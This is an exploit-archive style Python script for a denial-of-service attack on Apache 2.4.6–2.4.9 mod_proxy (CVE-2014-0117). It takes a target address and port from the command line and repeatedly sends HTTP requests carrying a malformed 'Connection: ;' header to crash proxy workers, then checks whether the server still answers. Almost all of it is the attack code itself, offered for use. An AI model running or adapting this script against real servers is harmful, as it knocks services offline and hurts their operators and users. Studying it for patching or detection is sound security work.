No description provided by source.
# Exploit Title: Apache 2.4.x mod_proxy Denial Of Service(CVE-2014-0117)
# Date: 2014-07-20
# Exploit Author: aisyhi
# Version: 0.1
# Apache httpd 2.4.6 to 2.4.9
# Tested on: Apache/2.4.7
# CVE : CVE-2014-0117
import httplib
import logging
import time
import socket
import sys
import os
debug = False
socket.setdefaulttimeout(3)
httplib.HTTPConnection.debuglevel = 1 if debug else 0
packet = 0
print "======================================================================"
print u"Apache 2.4.x mod_proxy Denial Of Service(CVE-2014-0117)"
print "======================================================================"
if len(sys.argv) < 2:
print "Usage: python CVE-2014-0117.py [target ip] [target port]\n"
print "Example: python CVE-2014-0117 127.0.0.1\n"
sys.exit(1)
else:
host = sys.argv[1].lower()
try:
port = int(sys.argv[2])
except:
port = 80
while packet <= 10:
try:
con = httplib.HTTPConnection(host, port)
con.putrequest('GET', '/')
con.putheader('User-Agent', "curl/7.30.0")
con.putheader('Accept', "*/*")
con.putheader('Connection', ";")
con.endheaders()
except:
print "Connection error!"
sys.exit(1)
try:
resp = con.getresponse()
print(resp.status, resp.reason)
except socket.timeout:
print "[*] Socket timeout?"
except:
print "[*] Knock knock, is anybody there ? (" + str(packet) + "/10)"
packet = packet + 1
con.close()
print "[+] Done!"